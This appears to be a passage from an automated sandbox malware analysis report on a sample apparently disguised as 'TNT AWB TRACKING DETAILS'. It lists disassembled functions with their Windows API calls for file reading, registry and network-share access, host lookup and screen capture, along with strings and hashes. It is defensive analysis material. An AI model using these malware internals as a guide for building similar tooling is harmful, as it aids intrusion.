                                                    • Instruction Fuzzy Hash: 00515C725043059FC700EF20C985D6AB7E4FF98758F00886DF89A67262DB72ED0ADB52
                                                    Function 00F1F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00EFE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00F1F8DF
                                                    • LoadStringW.USER32(00000000,?,00EFE029,00000001), ref: 00F1F8E8
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • GetModuleHandleW.KERNEL32(00000000,00F85310,?,00000FFF,?,?,00EFE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00F1F90A
                                                    • LoadStringW.USER32(00000000,?,00EFE029,00000001), ref: 00F1F90D
                                                    • __swprintf.LIBCMT ref: 00F1F95D
                                                    • __swprintf.LIBCMT ref: 00F1F96E
                                                    • _wprintf.LIBCMT ref: 00F1FA17
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F1FA2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 984253442-2268648507
                                                    • Opcode ID: 6eed7382b1d449eff118dfe6d87919392fe4cf23d4cfb2e1cf8ec32fde06281c
                                                    • Instruction ID: 71929d0b5d5b0f95d912ec193d980c2201f674940b0409502b77deb03875daea
                                                    • Opcode Fuzzy Hash: 6eed7382b1d449eff118dfe6d87919392fe4cf23d4cfb2e1cf8ec32fde06281c
                                                    • Instruction Fuzzy Hash: 7A41457290410DAACF04FBE0DE46EEEB7B8AF58350F501069F505B6092DA366F4ADF61
                                                    Function 00F4BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F49207,?,?), ref: 00F4BA56
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F49207,?,?,00000000,?), ref: 00F4BA6D
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F49207,?,?,00000000,?), ref: 00F4BA78
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00F49207,?,?,00000000,?), ref: 00F4BA85
                                                    • GlobalLock.KERNEL32(00000000), ref: 00F4BA8E
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F49207,?,?,00000000,?), ref: 00F4BA9D
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F4BAA6
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00F49207,?,?,00000000,?), ref: 00F4BAAD
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F49207,?,?,00000000,?), ref: 00F4BABE
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F52CAC,?), ref: 00F4BAD7
                                                    • GlobalFree.KERNEL32(00000000), ref: 00F4BAE7
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00F4BB0B
                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F4BB36
                                                    • DeleteObject.GDI32(00000000), ref: 00F4BB5E
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F4BB74
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    • Opcode ID: be5ea60a2efe790c4757051538d09616d60c4883b8304e1e3bf73563a2db3b53
                                                    • Instruction ID: f3942d122b44aec0e0fad55c5a1c1ede3a3bb3c292b264e06514df53c48f3492
                                                    • Opcode Fuzzy Hash: be5ea60a2efe790c4757051538d09616d60c4883b8304e1e3bf73563a2db3b53
                                                    • Instruction Fuzzy Hash: 9D412A79500208EFDB119F65DC48EAB7BB8EB9AB21F104068FD09D7261D7749A05EB60
                                                    Function 00F2D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 00F2DA10
                                                    • _wcscat.LIBCMT ref: 00F2DA28
                                                    • _wcscat.LIBCMT ref: 00F2DA3A
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F2DA4F
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2DA63
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00F2DA7B
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F2DA95
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2DAA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                    • String ID: *.*
                                                    • API String ID: 34673085-438819550
                                                    • Opcode ID: 9110bc10ccf86dca9dd20709758d4755fcbf7bd4b74f49ef65990f00884a105f
                                                    • Instruction ID: 229251b18be3c2c2188cef3bc0644f340a8bf456d191cf790bf67e18a7a7b0c0
                                                    • Opcode Fuzzy Hash: 9110bc10ccf86dca9dd20709758d4755fcbf7bd4b74f49ef65990f00884a105f
                                                    • Instruction Fuzzy Hash: 8C81E4729043549FCB24DF64D844AAAB7E8FF89320F14882EF889D7211E731DD85DB52
                                                    Function 00F4C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F4C1FC
                                                    • GetFocus.USER32 ref: 00F4C20C
                                                    • GetDlgCtrlID.USER32(00000000), ref: 00F4C217
                                                    • _memset.LIBCMT ref: 00F4C342
                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F4C36D
                                                    • GetMenuItemCount.USER32(?), ref: 00F4C38D
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00F4C3A0
                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F4C3D4
                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F4C41C
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F4C454
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F4C489
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                    • String ID: 0
                                                    • API String ID: 1296962147-4108050209
                                                    • Opcode ID: cfb8269968b25811548d7102617ebf92587d00700ee5cb9c309b00969a7ca48a
                                                    • Instruction ID: 6475cd907ce0e6c0126ee92225ef109b3a5b3e56401b4441a8dee7b8e3f285af
                                                    • Opcode Fuzzy Hash: cfb8269968b25811548d7102617ebf92587d00700ee5cb9c309b00969a7ca48a
                                                    • Instruction Fuzzy Hash: 5981BE716093059FD750CF14C984A7BBBE8FB88724F00592EFE99972A1D770D904EBA2
                                                    Function 00F3731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00F3738F
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F3739B
                                                    • CreateCompatibleDC.GDI32(?), ref: 00F373A7
                                                    • SelectObject.GDI32(00000000,?), ref: 00F373B4
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F37408
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F37444
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F37468
                                                    • SelectObject.GDI32(00000006,?), ref: 00F37470
                                                    • DeleteObject.GDI32(?), ref: 00F37479
                                                    • DeleteDC.GDI32(00000006), ref: 00F37480
                                                    • ReleaseDC.USER32(00000000,?), ref: 00F3748B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: 02d4c9b37970d74e673ee31240930f3e9362cd7d5107b07712024d9852402f76
                                                    • Instruction ID: 0e8232eae9779139ed3e0b6955b5ae54dca8d9c538d146830e8e87d165b2821c
                                                    • Opcode Fuzzy Hash: 02d4c9b37970d74e673ee31240930f3e9362cd7d5107b07712024d9852402f76
                                                    • Instruction Fuzzy Hash: 39516EB5904309EFCB24DFA8CC84EAEBBB9EF49320F14842DF95997210D771A844DB50
                                                    Function 00EC6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EE0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00EC6B0C,?,00008000), ref: 00EE0973
                                                      • Part of subcall function 00EC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC4743,?,?,00EC37AE,?), ref: 00EC4770
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00EC6BAD
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC6CFA
                                                      • Part of subcall function 00EC586D: _wcscpy.LIBCMT ref: 00EC58A5
                                                      • Part of subcall function 00EE363D: _iswctype.LIBCMT ref: 00EE3645
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 537147316-1018226102
                                                    • Opcode ID: fa9ced4a7c8e43d22b35ae8d3a657d1ef5fabad6b2767a3b8b1997e9af5ad58a
                                                    • Instruction ID: 12b8ebeff38da1848da7975b12a35bdb84f6451c5bd91081d0c5428403e74420
                                                    • Opcode Fuzzy Hash: fa9ced4a7c8e43d22b35ae8d3a657d1ef5fabad6b2767a3b8b1997e9af5ad58a
                                                    • Instruction Fuzzy Hash: 2202CF311083449FC714EF24C981EAFBBE5EF94314F10582DF59AA72A1DB31E98ACB52
                                                    Function 00F22D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F22D50
                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F22DDD
                                                    • GetMenuItemCount.USER32(00F85890), ref: 00F22E66
                                                    • DeleteMenu.USER32(00F85890,00000005,00000000,000000F5,?,?), ref: 00F22EF6
                                                    • DeleteMenu.USER32(00F85890,00000004,00000000), ref: 00F22EFE
                                                    • DeleteMenu.USER32(00F85890,00000006,00000000), ref: 00F22F06
                                                    • DeleteMenu.USER32(00F85890,00000003,00000000), ref: 00F22F0E
                                                    • GetMenuItemCount.USER32(00F85890), ref: 00F22F16
                                                    • SetMenuItemInfoW.USER32(00F85890,00000004,00000000,00000030), ref: 00F22F4C
                                                    • GetCursorPos.USER32(?), ref: 00F22F56
                                                    • SetForegroundWindow.USER32(00000000), ref: 00F22F5F
                                                    • TrackPopupMenuEx.USER32(00F85890,00000000,?,00000000,00000000,00000000), ref: 00F22F72
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F22F7E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                    • String ID:
                                                    • API String ID: 3993528054-0
                                                    • Opcode ID: 6b62fc2424a1eca0b03a4cac46a99e96507b1c26750e430c6a752ae9e0bc2ff1
                                                    • Instruction ID: 157da36755ab08c3c6bb253c1fca0fa277c85674faddabf60c6f094356de9693
                                                    • Opcode Fuzzy Hash: 6b62fc2424a1eca0b03a4cac46a99e96507b1c26750e430c6a752ae9e0bc2ff1
                                                    • Instruction Fuzzy Hash: D471F671A00629BFEB618F54EC45FAABF64FF05324F140216F629AA1E0C7B55C20F791
                                                    Function 00F177DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    • _memset.LIBCMT ref: 00F1786B
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F178A0
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F178BC
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F178D8
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F17902
                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F1792A
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F17935
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F1793A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 1411258926-22481851
                                                    • Opcode ID: b6fb38556c86fc7f9f1633b2fe217aeed495421db75d10d0422f0c9dea5cdebf
                                                    • Instruction ID: 1bcfbdb05b796da69666bdd4a14d200752c0af438748a158e7f4f4e69c844a48
                                                    • Opcode Fuzzy Hash: b6fb38556c86fc7f9f1633b2fe217aeed495421db75d10d0422f0c9dea5cdebf
                                                    • Instruction Fuzzy Hash: 50413872C1422DABCF11EBA4DD85EEEB7B8BF58310F404069E819B3161DA319D49DF90
                                                    Function 00F40E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F3FDAD,?,?), ref: 00F40E31
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-909552448
                                                    • Opcode ID: 788b46f45dae7b03493b57f62c3955f10e550d031b7e1519ce92e3c3ab056441
                                                    • Instruction ID: 898b99587209d9f454ebdf63eeba66cb50757bc575bcedd56034e73634e79854
                                                    • Opcode Fuzzy Hash: 788b46f45dae7b03493b57f62c3955f10e550d031b7e1519ce92e3c3ab056441
                                                    • Instruction Fuzzy Hash: 68419C3250424E8BCF10EF50D855AEE3BA4EF11320F148425FD592B292DBB19D9BEBA1
                                                    Function 00F1F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00EFE2A0,00000010,?,Bad directive syntax error,00F4F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F1F7C2
                                                    • LoadStringW.USER32(00000000,?,00EFE2A0,00000010), ref: 00F1F7C9
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • _wprintf.LIBCMT ref: 00F1F7FC
                                                    • __swprintf.LIBCMT ref: 00F1F81E
                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F1F88D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 1506413516-4153970271
                                                    • Opcode ID: e0999aaaa994760882d76e2dc309217b8f0e198344307b0e523dc5740a28f869
                                                    • Instruction ID: 1598512efdab82e8775ed0c23d1096f1e80660ef7403be3751c222f9d1ad11fd
                                                    • Opcode Fuzzy Hash: e0999aaaa994760882d76e2dc309217b8f0e198344307b0e523dc5740a28f869
                                                    • Instruction Fuzzy Hash: 5321753294021EEBCF11EF90CC09FED7775BF18310F04446AF519760A1DA729559EB51
                                                    Function 00F252C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                      • Part of subcall function 00EC7924: _memmove.LIBCMT ref: 00EC79AD
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F25330
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F25346
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F25357
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F25369
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F2537A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 2279737902-1007645807
                                                    • Opcode ID: 0271bdfe16439b411a4b9a4155620d4baf4788e6c3cdc5184739cfd1e21c2213
                                                    • Instruction ID: 0dbe69da0c8dc83f5bde6394c3ce454b7b6cb7cbaf48b7d3dfd1112868745b95
                                                    • Opcode Fuzzy Hash: 0271bdfe16439b411a4b9a4155620d4baf4788e6c3cdc5184739cfd1e21c2213
                                                    • Instruction Fuzzy Hash: C411E231A9012979D724F661DC4AEFFBBBCEBD5F90F00042AB416A20D0DEB14C06D9A2
                                                    Function 00F246B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 208665112-3771769585
                                                    • Opcode ID: a808b5a0b11abc582a5ab44300310e373aea1b831512ca6ccb5b121c094136ea
                                                    • Instruction ID: f215396b17f7770f7f2c357b3c407ecb565d7dca64e72688a4c90cb3e059660a
                                                    • Opcode Fuzzy Hash: a808b5a0b11abc582a5ab44300310e373aea1b831512ca6ccb5b121c094136ea
                                                    • Instruction Fuzzy Hash: 90112B3590012C6FDB10AB30AC46EDA77BCDF12721F00017AF959A6091FFB59D85E651
                                                    Function 00F24F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • timeGetTime.WINMM ref: 00F24F7A
                                                      • Part of subcall function 00EE049F: timeGetTime.WINMM(?,7694B400,00ED0E7B), ref: 00EE04A3
                                                    • Sleep.KERNEL32(0000000A), ref: 00F24FA6
                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00F24FCA
